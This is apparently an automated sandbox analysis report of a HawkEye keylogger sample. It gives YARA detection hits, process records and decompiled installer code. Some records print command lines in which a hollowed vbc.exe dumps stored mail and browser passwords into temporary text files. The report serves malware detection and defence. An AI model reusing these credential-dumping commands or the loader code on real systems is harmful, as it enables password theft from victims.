                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, Author: Arnim Rupp
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000000.350302983.0000000007610000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000002.391554115.0000000007610000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000000.357332118.0000000007610000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, Author: Arnim Rupp
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            Reputation:low

                                                                                            General

                                                                                            Start time:18:17:52
                                                                                            Start date:07/12/2021
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:dw20.exe -x -s 2128
                                                                                            Imagebase:0x10000000
                                                                                            File size:33936 bytes
                                                                                            MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            General

                                                                                            Start time:18:17:54
                                                                                            Start date:07/12/2021
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
                                                                                            Imagebase:0x400000
                                                                                            File size:1171592 bytes
                                                                                            MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000000.330182095.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000000.330884518.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000000.329440107.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            Reputation:high

                                                                                            General

                                                                                            Start time:18:17:55
                                                                                            Start date:07/12/2021
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                                                                                            Imagebase:0x400000
                                                                                            File size:1171592 bytes
                                                                                            MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000000.331916237.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            Reputation:high

                                                                                            Disassembly

                                                                                            Code Analysis

                                                                                              Executed Functions

                                                                                              C-Code - Quality: 83%
                                                                                              			_entry_() {
                                                                                              				struct _SHFILEINFOA _v360;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v376;
                                                                                              				char _v380;
                                                                                              				CHAR* _v384;
                                                                                              				char _v396;
                                                                                              				int _v400;
                                                                                              				int _v404;
                                                                                              				CHAR* _v408;
                                                                                              				intOrPtr _v412;
                                                                                              				int _v416;
                                                                                              				intOrPtr _v420;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v424;
                                                                                              				void* _v432;
                                                                                              				int _t34;
                                                                                              				CHAR* _t39;
                                                                                              				char* _t42;
                                                                                              				signed int _t44;
                                                                                              				void* _t48;
                                                                                              				intOrPtr _t50;
                                                                                              				signed int _t52;
                                                                                              				signed int _t55;
                                                                                              				int _t56;
                                                                                              				signed int _t60;
                                                                                              				intOrPtr _t71;
                                                                                              				intOrPtr _t77;
                                                                                              				void* _t79;
                                                                                              				void* _t89;
                                                                                              				void* _t91;
                                                                                              				char* _t96;
                                                                                              				signed int _t97;
                                                                                              				void* _t98;
                                                                                              				signed int _t99;
                                                                                              				signed int _t100;
                                                                                              				signed int _t103;
                                                                                              				CHAR* _t105;
                                                                                              				signed int _t106;
                                                                                              				intOrPtr _t113;
                                                                                              				char _t120;
                                                                                              
                                                                                              				_v376 = 0;
                                                                                              				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                              				_t99 = 0;
                                                                                              				_v380 = 0x20;
                                                                                              				__imp__#17();
                                                                                              				_t34 = SetErrorMode(0x8001); // executed
                                                                                              				__imp__OleInitialize(0); // executed
                                                                                              				 *0x42ec18 = _t34;
                                                                                              				 *0x42eb64 = E00405C49(8);
                                                                                              				SHGetFileInfoA(0x428f90, 0,  &_v360, 0x160, 0); // executed
                                                                                              				E0040592B("qjsvdse Setup", "NSIS Error");
                                                                                              				_t39 = GetCommandLineA();
                                                                                              				_t96 = "\"C:\\Users\\alfons\\Desktop\\5.exe\" ";
                                                                                              				E0040592B(_t96, _t39);
                                                                                              				 *0x42eb60 = GetModuleHandleA(0);
                                                                                              				_t42 = _t96;
                                                                                              				if("\"C:\\Users\\alfons\\Desktop\\5.exe\" " == 0x22) {
                                                                                              					_v404 = 0x22;
                                                                                              					_t42 =  &M00434001;
                                                                                              				}
                                                                                              				_t44 = CharNextA(E00405449(_t42, _v404));
                                                                                              				_v404 = _t44;
                                                                                              				while(1) {
                                                                                              					_t91 =  *_t44;
                                                                                              					_t109 = _t91;
                                                                                              					if(_t91 == 0) {
                                                                                              						break;
                                                                                              					}
                                                                                              					__eflags = _t91 - 0x20;
                                                                                              					if(_t91 != 0x20) {
                                                                                              						L5:
                                                                                              						__eflags =  *_t44 - 0x22;
                                                                                              						_v404 = 0x20;
                                                                                              						if( *_t44 == 0x22) {
                                                                                              							_t44 = _t44 + 1;
                                                                                              							__eflags = _t44;
                                                                                              							_v404 = 0x22;
                                                                                              						}
                                                                                              						__eflags =  *_t44 - 0x2f;
                                                                                              						if( *_t44 != 0x2f) {
                                                                                              							L15:
                                                                                              							_t44 = E00405449(_t44, _v404);
                                                                                              							__eflags =  *_t44 - 0x22;
                                                                                              							if(__eflags == 0) {
                                                                                              								_t44 = _t44 + 1;
                                                                                              								__eflags = _t44;
                                                                                              							}
                                                                                              							continue;
                                                                                              						} else {
                                                                                              							_t44 = _t44 + 1;
                                                                                              							__eflags =  *_t44 - 0x53;
                                                                                              							if( *_t44 == 0x53) {
                                                                                              								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
                                                                                              								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
                                                                                              									_t99 = _t99 | 0x00000002;
                                                                                              									__eflags = _t99;
                                                                                              								}
                                                                                              							}
                                                                                              							__eflags =  *_t44 - 0x4352434e;
                                                                                              							if( *_t44 == 0x4352434e) {
                                                                                              								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
                                                                                              								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
                                                                                              									_t99 = _t99 | 0x00000004;
                                                                                              									__eflags = _t99;
                                                                                              								}
                                                                                              							}
                                                                                              							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
                                                                                              							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
                                                                                              								 *((intOrPtr*)(_t44 - 2)) = 0;
                                                                                              								_t45 = _t44 + 2;
                                                                                              								__eflags = _t44 + 2;
                                                                                              								E0040592B("C:\\Users\\alfons\\AppData\\Local\\Temp", _t45);
                                                                                              								L20:
                                                                                              								_t105 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
                                                                                              								GetTempPathA(0x400, _t105);
                                                                                              								_t48 = E004030AF(_t109);
                                                                                              								_t110 = _t48;
                                                                                              								if(_t48 != 0) {
                                                                                              									L22:
                                                                                              									DeleteFileA("1033"); // executed
                                                                                              									_t50 = E00402C0B(_t111, _t99); // executed
                                                                                              									_v412 = _t50;
                                                                                              									if(_t50 != 0) {
                                                                                              										L32:
                                                                                              										E00403464();
                                                                                              										__imp__OleUninitialize();
                                                                                              										if(_v408 == 0) {
                                                                                              											__eflags =  *0x42ebf4; // 0x0
                                                                                              											if(__eflags != 0) {
                                                                                              												_t106 = E00405C49(3);
                                                                                              												_t100 = E00405C49(4);
                                                                                              												_t55 = E00405C49(5);
                                                                                              												__eflags = _t106;
                                                                                              												_t97 = _t55;
                                                                                              												if(_t106 != 0) {
                                                                                              													__eflags = _t100;
                                                                                              													if(_t100 != 0) {
                                                                                              														__eflags = _t97;
                                                                                              														if(_t97 != 0) {
                                                                                              															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
                                                                                              															__eflags = _t60;
                                                                                              															if(_t60 != 0) {
                                                                                              																 *_t100(0, "SeShutdownPrivilege",  &_v400);
                                                                                              																_v416 = 1;
                                                                                              																_v404 = 2;
                                                                                              																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
                                                                                              															}
                                                                                              														}
                                                                                              													}
                                                                                              												}
                                                                                              												_t56 = ExitWindowsEx(2, 0);
                                                                                              												__eflags = _t56;
                                                                                              												if(_t56 == 0) {
                                                                                              													E0040140B(9);
                                                                                              												}
                                                                                              											}
                                                                                              											_t52 =  *0x42ec0c; // 0xffffffff
                                                                                              											__eflags = _t52 - 0xffffffff;
                                                                                              											if(_t52 != 0xffffffff) {
                                                                                              												_v400 = _t52;
                                                                                              											}
                                                                                              											ExitProcess(_v400);
                                                                                              										}
                                                                                              										E004051EC(_v408, 0x200010);
                                                                                              										ExitProcess(2);
                                                                                              									}
                                                                                              									_t113 =  *0x42eb7c; // 0x0
                                                                                              									if(_t113 == 0) {
                                                                                              										L31:
                                                                                              										 *0x42ec0c =  *0x42ec0c | 0xffffffff;
                                                                                              										_v400 = E00403489();
                                                                                              										goto L32;
                                                                                              									}
                                                                                              									_t103 = E00405449(_t96, 0);
                                                                                              									while(_t103 >= _t96) {
                                                                                              										__eflags =  *_t103 - 0x3d3f5f20;
                                                                                              										if(__eflags == 0) {
                                                                                              											break;
                                                                                              										}
                                                                                              										_t103 = _t103 - 1;
                                                                                              										__eflags = _t103;
                                                                                              									}
                                                                                              									_t115 = _t103 - _t96;
                                                                                              									_v408 = "Error launching installer";
                                                                                              									if(_t103 < _t96) {
                                                                                              										lstrcatA(_t105, "~nsu.tmp");
                                                                                              										_t101 = "C:\\Users\\alfons\\Desktop";
                                                                                              										if(lstrcmpiA(_t105, "C:\\Users\\alfons\\Desktop") == 0) {
                                                                                              											goto L32;
                                                                                              										}
                                                                                              										CreateDirectoryA(_t105, 0);
                                                                                              										SetCurrentDirectoryA(_t105);
                                                                                              										_t120 = "C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
                                                                                              										if(_t120 == 0) {
                                                                                              											E0040592B("C:\\Users\\alfons\\AppData\\Local\\Temp", _t101);
                                                                                              										}
                                                                                              										E0040592B(0x42f000, _v396);
                                                                                              										 *0x42f400 = 0x41;
                                                                                              										_t98 = 0x1a;
                                                                                              										do {
                                                                                              											_t71 =  *0x42eb70; // 0x654160
                                                                                              											E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t71 + 0x120)));
                                                                                              											DeleteFileA(0x428b90);
                                                                                              											if(_v416 != 0 && CopyFileA("C:\\Users\\alfons\\Desktop\\5.exe", 0x428b90, 1) != 0) {
                                                                                              												_push(0);
                                                                                              												_push(0x428b90);
                                                                                              												E00405679();
                                                                                              												_t77 =  *0x42eb70; // 0x654160
                                                                                              												E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t77 + 0x124)));
                                                                                              												_t79 = E0040518B(0x428b90);
                                                                                              												if(_t79 != 0) {
                                                                                              													CloseHandle(_t79);
                                                                                              													_v416 = 0;
                                                                                              												}
                                                                                              											}
                                                                                              											 *0x42f400 =  *0x42f400 + 1;
                                                                                              											_t98 = _t98 - 1;
                                                                                              										} while (_t98 != 0);
                                                                                              										_push(0);
                                                                                              										_push(_t105);
                                                                                              										E00405679();
                                                                                              										goto L32;
                                                                                              									}
                                                                                              									 *_t103 = 0;
                                                                                              									_t104 = _t103 + 4;
                                                                                              									if(E004054FF(_t115, _t103 + 4) == 0) {
                                                                                              										goto L32;
                                                                                              									}
                                                                                              									E0040592B("C:\\Users\\alfons\\AppData\\Local\\Temp", _t104);
                                                                                              									E0040592B("C:\\Users\\alfons\\AppData\\Local\\Temp", _t104);
                                                                                              									_v424 = 0;
                                                                                              									goto L31;
                                                                                              								}
                                                                                              								GetWindowsDirectoryA(_t105, 0x3fb);
                                                                                              								lstrcatA(_t105, "\\Temp");
                                                                                              								_t89 = E004030AF(_t110);
                                                                                              								_t111 = _t89;
                                                                                              								if(_t89 == 0) {
                                                                                              									goto L32;
                                                                                              								}
                                                                                              								goto L22;
                                                                                              							}
                                                                                              							goto L15;
                                                                                              						}
                                                                                              					} else {
                                                                                              						goto L4;
                                                                                              					}
                                                                                              					do {
                                                                                              						L4:
                                                                                              						_t44 = _t44 + 1;
                                                                                              						__eflags =  *_t44 - 0x20;
                                                                                              					} while ( *_t44 == 0x20);
                                                                                              					goto L5;
                                                                                              				}
                                                                                              				goto L20;
                                                                                              			}









































                                                                                              0x004031f3
                                                                                              0x004031f8
                                                                                              0x004031fb
                                                                                              0x004031fd
                                                                                              0x004031fd
                                                                                              0x004031fd
                                                                                              0x00000000
                                                                                              0x004031bb
                                                                                              0x004031bb
                                                                                              0x004031bc
                                                                                              0x004031bf
                                                                                              0x004031c7
                                                                                              0x004031ca
                                                                                              0x004031cc
                                                                                              0x004031cc
                                                                                              0x004031cc
                                                                                              0x004031ca
                                                                                              0x004031cf
                                                                                              0x004031d5
                                                                                              0x004031dd
                                                                                              0x004031e0
                                                                                              0x004031e2
                                                                                              0x004031e2
                                                                                              0x004031e2
                                                                                              0x004031e0
                                                                                              0x004031e5
                                                                                              0x004031ec
                                                                                              0x00403206
                                                                                              0x00403209
                                                                                              0x00403209
                                                                                              0x00403212
                                                                                              0x00403217
                                                                                              0x00403217
                                                                                              0x00403222
                                                                                              0x00403228
                                                                                              0x0040322d
                                                                                              0x0040322f
                                                                                              0x00403251
                                                                                              0x00403256
                                                                                              0x0040325d
                                                                                              0x00403264
                                                                                              0x00403268
                                                                                              0x004032cf
                                                                                              0x004032cf
                                                                                              0x004032d4
                                                                                              0x004032de
                                                                                              0x004033c9
                                                                                              0x004033cf
                                                                                              0x004033da
                                                                                              0x004033e3
                                                                                              0x004033e5
                                                                                              0x004033ea
                                                                                              0x004033ec
                                                                                              0x004033ee
                                                                                              0x004033f0
                                                                                              0x004033f2
                                                                                              0x004033f4
                                                                                              0x004033f6
                                                                                              0x00403406
                                                                                              0x00403408
                                                                                              0x0040340a
                                                                                              0x00403417
                                                                                              0x00403426
                                                                                              0x0040342e
                                                                                              0x00403436
                                                                                              0x00403436
                                                                                              0x0040340a
                                                                                              0x004033f6
                                                                                              0x004033f2
                                                                                              0x0040343b
                                                                                              0x00403441
                                                                                              0x00403443
                                                                                              0x00403447
                                                                                              0x00403447
                                                                                              0x00403443
                                                                                              0x0040344c
                                                                                              0x00403451
                                                                                              0x00403454
                                                                                              0x00403456
                                                                                              0x00403456
                                                                                              0x0040345e
                                                                                              0x0040345e
                                                                                              0x004032ed
                                                                                              0x004032f4
                                                                                              0x004032f4
                                                                                              0x0040326a
                                                                                              0x00403270
                                                                                              0x004032bf
                                                                                              0x004032bf
